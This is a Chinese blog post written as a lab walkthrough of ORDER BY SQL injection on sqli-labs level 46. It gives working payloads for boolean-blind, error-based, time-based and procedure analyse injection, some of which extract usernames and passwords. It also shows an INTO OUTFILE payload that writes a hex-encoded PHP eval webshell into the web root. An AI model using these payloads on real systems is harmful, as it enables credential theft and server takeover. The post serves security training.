ORDER BY 注入学习以及sqli-labs46关学习

最新推荐文章于 2024-07-25 19:12:52 发布
最新推荐文章于 2024-07-25 19:12:52 发布
阅读量709 收藏 1
点赞数 1
分类专栏: 靶场学习 PHP代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109558035
版权
本文深入探讨了ORDER BY注入的概念,通过分析sqli-labs46关的代码,展示了如何利用注入语句、rand函数以及and条件进行注入攻击。同时,介绍了布尔盲注、报错注入和延时注入等方法,包括IF延时注入、procedure analyse参数注入、利用into oufile参数和lines terminated by上传木马的技巧。
摘要由CSDN通过智能技术生成

ORDER BY 注入学习

分析第46关代码

在这里插入图片描述


**注入方式**

1. 直接添加注入语句 ?sort=(select …)
2. 利用一些函数,如rand函数。 ?rand(sql语句) ?rand(true)或者rand(fakse)
3. 利用and 例如?sort=1 and (sql语句)或者直接?sort=sql语句 可以报错或者时间盲注

方式2

http://127.0.0.1/sqli-labs-master/Less-46/?sort=rand(true)

在这里插入图片描述false

http://127.0.0.1/sqli-labs-master/Less-46/?sort=rand(false)

在这里插入图片描述

上边可以看到rand(true)rand(false)的返回结果是不一样的,我们可以据此来进行基于布尔的盲注

基于布尔盲注的payload

?sort=rand(left(database(),1)='s')
#left(database(),1)='s'    如果数据库名第一位是s就返回true,否则就是false  =====>?sort(true)
然后根据上边的rand(true)rand(false)页面进行判断


如果'和=被过滤,可以使用ascii进行判断,如?sort=rand(ascii(left(database(),1))=115)

在这里插入图片描述

方式3

报错注入获取数据库名

?sort=(select count(*) from information_schema.columns group by concat(0x5c,(select database()),0x5c,floor(rand()*2)) limit 0,1)
#此处使用的是第五关学习的报错注入,参考第五关,灵活构造即可

在这里插入图片描述
获取账号密码 payload

and (select 1 from (select count(*),concat(0x3a,0x3a,(select concat_ws(char(32,58,32),id,username,password) from users limit 0,1),0x3a,0x3a,floor(rand(0)*2))as a from information_schema.columns group by a)b)

在这里插入图片描述

延时注入

1.IF延时注入

?sort=IF(substr(database(),1,1)='s',1,sleep(3))

sqli注入天书中还有一段payload
http://127.0.0.1/sqli-labs/Less-46/?sort=%20(SELECT%20IF(SUBSTRING(current,1,1)=CHAR(115), BENCHMARK(50000000,md5(%271%27)),null)%20FROM%20(select%20database()%20as%20curr ent)%20as%20tb1)
BENCHMARK函数相当于sleep函数

在这里插入图片描述在这里插入图片描述

2.procedure analyse参数后注入

利用procedure analyse参数,可以执行报错注入
在procedure analyse和order by之间可以存在limit参数,实际应用中,往往也可能存在limit后的注入,我们可以利用procedure analyse注入


 PROCEDURE ANALYSE() ,在优化表结构时可以辅助参考分析语句。

 利用此语句,MySQL 帮你去分析你的字段和其实际的数据,并会给你一些有用的建议。


?sort=1 procedure analyse(extractvalue(rand()*2,concat(0x3a,version())),1)

3. 导入导出文件into oufile参数

?sort=1 into outfile "C:\\phpstudy\\WWW\\sqli-labs-master\\Less-46\\test.txt"

在这里插入图片描述

4.利用lines terminated by上传16进制木马

http://127.0.0.1/sqli-labs-master/Less-46/?sort=1%20into%20outfile%20%22C:\\phpstudy\\WWW\\sqli-labs-master\\Less-46\\te.php%22%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

在这里插入图片描述
菜刀连接
在这里插入图片描述

kongytr
关注
专栏目录
sqli-labs Less-46、47、48、49(sqli-labs闯指南 46、47、48、49)—order by 相注入
m0_54899775的博客
12-28 1154
sqli-labs Less-46、47、48、49(sqli-labs闯指南 46、47、48、49)—order by 相注入
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1416
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场第46
weixin_72583035的博客
02-26 281
打开46利用 order by 后的一些参数进行注入。所以sort=1的意思就是以第一列数据也就是ID进行排序输入sort=2就是以第二列也就是username进行排序输入sort=3就是以第三列也就是password进行排序输入sort=4发现会报错,因为根本没有第四列数据,这也是order by为什么能作为判断字段数的原因从上述可以知道这是为什么order by可以判断字段数的原因我们使用报错注入攻击查看当前库输入?sort=1 and updatexml(1,concat(0x7e,(databas
Sqli-labs Less_46-Less_53 order by后的injection
最新发布
beiweixiaotian66的博客
07-25 878
一丢丢Sqli-labs小练习
sqli-labs-master 过 46 - 53(附解题思路及解析)
weixin_47306547的博客
09-08 911
目录 第 46 ​ ​​第 47 第 48 ​​ 第 49 第 50 第 51 第 52 第 53 46 排序注入 源码: $sql = "SELECT * FROM users ORDER BY $id"; select使用文档:https://dev.mysql.com/doc/refman/8.0/en/select.html 分析:不同于 where 查询后可以用 union select
网络安全——sqli-labs第46详解
m0_69151365的博客
02-22 989
这一里,源码中没有注释掉MySQL的报错信息,所以我们可以进行报错注入,如果MySQL报错信息一旦被注释掉,我们就只能使用order by注入了,其实order by还有很多的注入方式,rand只是其中一个。大家有兴趣可以去学一下。
sql-labs第46 order by盲注
ytdd66的博客
02-26 1272
来到了第46进入卡发现让我们输入的参数为sort,我们输入?sort=1尝试:输入?sort=2,3,发现表格按照顺序进行排列输出,明显是使用了order by相的函数。我们将参数变成1'进行尝试,就会报错:查看源码:通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入:分别显示升序和降序的表格,说明此处是注入点,即注入点在order by后的参数中,而order by不同于在where后的注入,不能使用union等进行注入
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 720
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1862
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs Less-50、51、52、53(sqli-labs闯指南 50、51、52、53)— orderby stacked injection
m0_54899775的博客
12-28 714
sqli-labs Less-50、51、52、53(sqli-labs闯指南 50、51、52、53)— orderby stacked injection
基于Sqli-Labs靶场的SQL注入-46~53
Joker
01-12 670
这一片博客我主要讲解 Order By注入,其实 Order By注入只是把参数变了,其余的操作都和之前参数为ID的时候大同小异,最大的区别就是 Order By注入不能使用Union联合注入
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
sql-labs闯46~53
qq_44663230的博客
09-10 1279
sql-labs46~53 order by 排序注入
sqlilabs第46两种解法
m0_62738649的博客
02-21 303
第二种方法时间盲注法,我们可以将要查询的字母数字查询出来(可以用substr()函数截取)并比较界面的反应时间来判断是否猜中。延迟的时间并不是sleep(1)中的1秒,而是大于1秒。它与所查询的数据的条数是成倍数系的。可以知道它是按照我们输入的sort值来排序的。在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。计算公式:延迟时间=sleep(1)的秒数*所查询数据条数。如果查询的数据很多时,延迟的时间就会特别长。时,这时候发现屏幕上的显示的不是再是。注入就是通过可控制的位置在。
Oracle-order by
洪晓鸿
03-19 505
Oracle-order bycodeprintscreen code -- in 的作用 如果元素在我们的集合中(不在乎是否重复),只要在就满足条件 -- between and 某元素包含在某个区间,是包括相等的情况的 alter table t_user add birthday date select * from t_user update t_user set birthday=cur...
Oracle注入
时光凉春衫薄的博客
02-26 1267
Oracle注入 1.首先order by 数量确定列的数量 2.然后union select null,’null’,null from admin   必须用null如果返回错入则代表引号内的列不是字符列,直到返回正确的为止 3.判断一下数据库中的表网址后面加上and (select count(*) from admin) <>0 返回正常,说明存在admin表。如果返回错...
sqli-Labs————less-46order by 之后的注入
Fly_鹏程万里
05-21 1363
前言从这一开始将会介绍一下order by相注入内容。Less-46源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o...
sqli-labs(十六)(order by注入)
weixin_30325793的博客
09-05 87
第四十六: http://www.bubuko.com/infodetail-2481914.html 这有篇文章讲得还不错可以看下 这order by后面的一个注入,用报错注入和盲注都是可以的 先看源码吧 可以看到是order by后面存在注入漏洞。 输入?sort=1' 页面报错,可以使用报错注入 后面的流程和之前报错注入的流程没什么区别了 ?sort=1 and...
order by/limit 注入
阿金正传
04-19 2005
类似的代码 php code SELET * FROM page WHERE id=1 ORDER BY id [参数] ASC [参数] LIMIT 10,10 [参数] [参数] – 为存在注入的参数 我们不能在这注入上使用union,所以我们只能使用其他我们可以利用的   在order by id [参数] 之后使用双重查询   假设有以下网站 code: http://
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值